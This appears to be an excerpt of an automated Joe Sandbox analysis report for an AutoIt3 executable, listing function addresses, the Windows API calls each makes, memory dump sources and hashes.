                                      • Instruction ID: ddc79990d57db283a672420edff634b1bcba5badab22288edfdeae4787ebc5c7
                                      • Opcode Fuzzy Hash: e694136569ff394c7df59cfd63d5c316da5ae2c8fbda07bf6bcdff3b5df3371c
                                      • Instruction Fuzzy Hash: 4CF05E32005659BADB127F54AC0EFDE3F69BF05311F088011FA61A11E187B55551DFA9
                                      Function 0085AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0085AA6F
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0085AA82
                                      • GetCurrentThreadId.KERNEL32 ref: 0085AA89
                                      • AttachThreadInput.USER32(00000000), ref: 0085AA90
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 58ce768cb41e2a542382da8ada63cafecea70a33bc7ffe786bf737409beac00a
                                      • Instruction ID: d51cdcf266681b4c739d8a96af59cfc161676030fcc0e7ee526ccac169e2dbab
                                      • Opcode Fuzzy Hash: 58ce768cb41e2a542382da8ada63cafecea70a33bc7ffe786bf737409beac00a
                                      • Instruction Fuzzy Hash: 9EE01532541328BADB226BA2DD0CEEB3E1CFF217A2F048112B90994060C7718554CBA0
                                      Function 008025F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0080260D
                                      • SetTextColor.GDI32(?,000000FF), ref: 00802617
                                      • SetBkMode.GDI32(?,00000001), ref: 0080262C
                                      • GetStockObject.GDI32(00000005), ref: 00802634
                                      • GetWindowDC.USER32(?,00000000), ref: 0083C1C4
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083C1D1
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0083C1EA
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0083C203
                                      • GetPixel.GDI32(00000000,?,?), ref: 0083C223
                                      • ReleaseDC.USER32(?,00000000), ref: 0083C22E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 83f975f840aba6694d7e0d770d4a879dc5dd0edf9309acd0c445b3f87069848d
                                      • Instruction ID: b718d1cb4c57fd842bf778c98acb46001835ae257990fd126f0f1764acc1f425
                                      • Opcode Fuzzy Hash: 83f975f840aba6694d7e0d770d4a879dc5dd0edf9309acd0c445b3f87069848d
                                      • Instruction Fuzzy Hash: F5E0C932604244AEDB616FA8AC4DBD87B11FB55332F188367FA69980E187724990DF51
                                      Function 00859330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00859339
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00858F04), ref: 00859340
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00858F04), ref: 0085934D
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00858F04), ref: 00859354
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 83aa4964d33a942347341c8d78ceb00e609499f918b1b5ea6b432156c42b01c3
                                      • Instruction ID: b982b085ac47de2d1ce82bda47f910464eea1bd5b2a8730a2502a84ab7be47aa
                                      • Opcode Fuzzy Hash: 83aa4964d33a942347341c8d78ceb00e609499f918b1b5ea6b432156c42b01c3
                                      • Instruction Fuzzy Hash: DEE04F32601211DFD7202FB29D0DB967B6CFF50792F184859E685C9090E6349444CB50
                                      Function 00840679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00840679
                                      • GetDC.USER32(00000000), ref: 00840683
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008406A3
                                      • ReleaseDC.USER32(?), ref: 008406C4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: b383ef4a26c8b4c16fb2823baddc162c5a0963fdac9c97df3e68cfd259624413
                                      • Instruction ID: d12858ecc13c64d0ea8efca259884630ca0bf0d78b4de9afc5359d9a3f4eb0d5
                                      • Opcode Fuzzy Hash: b383ef4a26c8b4c16fb2823baddc162c5a0963fdac9c97df3e68cfd259624413
                                      • Instruction Fuzzy Hash: 35E0E5B2800308EFCB42AFA4D808A5D7BB1FFA8354F15800AF95AE7250CB7895519F50
                                      Function 0084068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 0084068D
                                      • GetDC.USER32(00000000), ref: 00840697
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008406A3
                                      • ReleaseDC.USER32(?), ref: 008406C4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: a081f809de0cc52085ebf794c75c659f34a1921a191a836afbb8cc21838f9784
                                      • Instruction ID: bc85d0d3d777ef9ac8a1b092f1850b7c88dc528b6a0a1235067811846ddd2f06
                                      • Opcode Fuzzy Hash: a081f809de0cc52085ebf794c75c659f34a1921a191a836afbb8cc21838f9784
                                      • Instruction Fuzzy Hash: 02E0E5B2800204AFCB42AF64D80865D7BA1FF98350F148006F959E7250CB7895518F50
                                      Function 00825FCC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00825FCD
                                        • Part of subcall function 00829BF4: GetLastError.KERNEL32(?,00821003,00828D5D,008259C3,?,?,00821003,?), ref: 00829BF6
                                        • Part of subcall function 00829BF4: __calloc_crt.LIBCMT ref: 00829C17
                                        • Part of subcall function 00829BF4: __initptd.LIBCMT ref: 00829C39
                                        • Part of subcall function 00829BF4: GetCurrentThreadId.KERNEL32 ref: 00829C40
                                        • Part of subcall function 00829BF4: SetLastError.KERNEL32(00000000,00821003,00828D5D,008259C3,?,?,00821003,?), ref: 00829C58
                                      • CloseHandle.KERNEL32(?,?,00825FAC), ref: 00825FE1
                                      • __freeptd.LIBCMT ref: 00825FE8
                                      • ExitThread.KERNEL32 ref: 00825FF0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                      • String ID:
                                      • API String ID: 4169687693-0
                                      • Opcode ID: e574edb217cbadb8887efe12b8e5c83d65fd4db684a588f8cae4c2b414ca0d1c
                                      • Instruction ID: 1cf1df1dfd3ae23126c542e6cb4411ada3c736feb6a68bc77bd426b1353741ec
                                      • Opcode Fuzzy Hash: e574edb217cbadb8887efe12b8e5c83d65fd4db684a588f8cae4c2b414ca0d1c
                                      • Instruction Fuzzy Hash: C2D05232002E709BC6322728B90AA2A2210FF00B31F084206F1A9E52E09B3089828A82
                                      Function 0085BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0085C057
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 2238bdde1a9e492a1a49d135b76653da2eddb0f84299fd7e78f36e79b538e108
                                      • Instruction ID: d6302c2651fbbb109547e304e4520367038577e39868d0e993457c9f4bd6595e
                                      • Opcode Fuzzy Hash: 2238bdde1a9e492a1a49d135b76653da2eddb0f84299fd7e78f36e79b538e108
                                      • Instruction Fuzzy Hash: 7B914670200705AFDB24DF68C884A6ABBE4FF49705F24846DF94ADB691DB71E849CF50
                                      Function 0086B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • __wcsnicmp.LIBCMT ref: 0086B670
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0086B739
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: 1095a154aa4a40bcabffa47e32005461f9a11224652f8192c9f25d1509c889b7
                                      • Instruction ID: 24c5418f054482f396d62a56a9574dc9bf7706844b4dc3155ffaca5045517fd8
                                      • Opcode Fuzzy Hash: 1095a154aa4a40bcabffa47e32005461f9a11224652f8192c9f25d1509c889b7
                                      • Instruction Fuzzy Hash: 7A619275A00219AFCB14EF98C891EAEB7B5FF48314F118059F906EB391DB70AE81CB51
                                      Function 0080E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0080E01E
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0080E037
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: cc997e6cc60ea9a7dc7d06503d36390fe12df6cadddb48b9e9d6ebd48a7b0908
                                      • Instruction ID: 07fd105aba4d681eeea38bf9c9777b72b0d8d121b5fd9ee81ff601a4b3ac902b
                                      • Opcode Fuzzy Hash: cc997e6cc60ea9a7dc7d06503d36390fe12df6cadddb48b9e9d6ebd48a7b0908
                                      • Instruction Fuzzy Hash: ED5159B24087449BE360AF54EC85BABB7E8FB84314F41484DF2D8811A1DB7195698B27
                                      Function 00888096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00888186
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0088819B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: ea57c0e2d60392eb0395934f38be57ca756410861a13935b09e9ac86040ff8cd
                                      • Instruction ID: d6d7bccd248c858159ac0f3d124d706cca55a61755d93adc2fa1480f93aa4063
                                      • Opcode Fuzzy Hash: ea57c0e2d60392eb0395934f38be57ca756410861a13935b09e9ac86040ff8cd
                                      • Instruction Fuzzy Hash: 29410878A0120ADFDB14DF68C885BDABBB5FF08300F50016AE904EB351DB71A956CF90
                                      Function 00872C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00872C6A
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00872CA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: bba8bfb7d663cd39e953909f317680457720ee6ee70f3dbcca7850db974cd00c
                                      • Instruction ID: 3cfff80ff41f60bb4bfad0b390578c57f4cccd822464285b692e79dbcf220832
                                      • Opcode Fuzzy Hash: bba8bfb7d663cd39e953909f317680457720ee6ee70f3dbcca7850db974cd00c
                                      • Instruction Fuzzy Hash: E8315D71C00119ABCF11EFA5DC85AEEBFB9FF04304F104019F928E6266DB319A56DBA1
                                      Function 00887088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 0088713C
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00887178
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 383e88ef3aee5ac857123963b3f630408cee660a1e3f79cb584de62c2483c255
                                      • Instruction ID: 24738fe15c72b423a10889099ed3bf9f727cd6427fdfefb7cb03d4b55ba71f99
                                      • Opcode Fuzzy Hash: 383e88ef3aee5ac857123963b3f630408cee660a1e3f79cb584de62c2483c255
                                      • Instruction Fuzzy Hash: 47316B75100604AEEB10AF68CC84AFB77B9FF88764F209619F9A5C7191DA31AC81CB60
                                      Function 00863049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 008630B8
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008630F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 5ddb13cc96c46a5daa3a1a26968288f7ed1db2019ea71fb8617c5dff6d5df007
                                      • Instruction ID: 5e1e0d432f09290f8b169a25e49415eee094cc3cef43ad76d8e48dea3b8dd9fa
                                      • Opcode Fuzzy Hash: 5ddb13cc96c46a5daa3a1a26968288f7ed1db2019ea71fb8617c5dff6d5df007
                                      • Instruction Fuzzy Hash: 2531D231600309EBEB258F58D885FAEBBF8FF06350F154019F985E61A2E7709B84CB51
                                      Function 008740B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      • __snwprintf.LIBCMT ref: 00874132
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __snwprintf_memmove
                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                      • API String ID: 3506404897-2584243854
                                      • Opcode ID: 3cb6255bd96f57929afcd982ba0a8ac876a84ef86c82415955c84d0b24fb1f2a
                                      • Instruction ID: 66cae00dc06471271666d24ffb108d58201490d6fd2bc4cf2f51aa08b8f25d9d
                                      • Opcode Fuzzy Hash: 3cb6255bd96f57929afcd982ba0a8ac876a84ef86c82415955c84d0b24fb1f2a
                                      • Instruction Fuzzy Hash: 99218230A0021CABCF14EF68C885AEE7BA9FF54740F844454F919E7241DB74E985DBA2
                                      Function 03CCA2DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,03CCA3BA), ref: 03CCA362
                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,03CCA3BA), ref: 03CCA368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DateFormatLocaleThread
                                      • String ID: yyyy
                                      • API String ID: 3303714858-3145165042
                                      • Opcode ID: db0d694c26d069e9fd3d847f2dba49efe346fcc014920b06be282c656dbd51cd
                                      • Instruction ID: 5a136e3063016fcc2031fa4a2c561987c578106c3111c4e4fc6f3aebabe7fb18
                                      • Opcode Fuzzy Hash: db0d694c26d069e9fd3d847f2dba49efe346fcc014920b06be282c656dbd51cd
                                      • Instruction Fuzzy Hash: 6921717CA2029CAFDB15EBA5C965AAEB3A8EF48300F5640ADEC05DB350D670DE40D761
                                      Function 00886CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00886D86
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00886D91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 2fbf275ee444a595bf814177a9176863e4ae69cd2aa31129a371d6f277def99e
                                      • Instruction ID: fdd751d079116a4056cfd5384aa9d8f5a9f3dd21b83ea9174d454321b575922d
                                      • Opcode Fuzzy Hash: 2fbf275ee444a595bf814177a9176863e4ae69cd2aa31129a371d6f277def99e
                                      • Instruction Fuzzy Hash: 92118271310209BFEF11AF54DC81EFB3B6AFB84364F114129F918DB290E676AC618B60
                                      Function 0088722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • GetWindowRect.USER32(00000000,?), ref: 00887296
                                      • GetSysColor.USER32(00000012), ref: 008872B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
